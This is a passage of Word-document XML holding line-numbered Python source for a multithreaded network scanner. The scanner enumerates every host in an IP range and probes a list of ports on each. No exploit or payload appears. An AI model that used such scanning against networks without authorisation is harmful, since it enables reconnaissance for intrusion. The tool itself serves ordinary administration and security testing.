          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>Range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232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233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234  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">active_hosts </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">[]                                      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># IP Host list with at least one open port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">235  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">ip_net </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>ipaddress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>ip_network</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>net_range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">)               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Create the network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">236  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">all_hosts </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>ip_net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>hosts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">())                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Generate all hosts in network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">237  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">port_list </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">port_list                                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># List of ports to scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">238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239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240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241  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">own_host </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>gethostname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">()                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Client Host name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">242  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">own_ip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>gethostbyname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>own_host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">)           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Client Host ip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">243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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">244  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">wait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>waitresponse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">245  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">hosts_scanned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t xml:space="preserve">0                                      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Total hosts scanned</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">246  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">247  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>start</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48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49  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'This host is %s (%s) ' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">% </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>own_host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>own_ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">250  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">251  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">hosts_scanned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">252  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">ip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>all_hosts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">:                                   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Scan the network range</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">253  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Thread host port scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">254  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">hs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>HostScan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>port_list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>verbose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>wait</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">255  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>hs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">256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hs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">257  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">hosts_scanned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">+= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">258  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">259  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Wait to finish threads before main thread starts again</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">260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61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62  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">263  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">264  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">265  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># FUNCTIONS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">266  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">267  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">268  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Get the external ip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
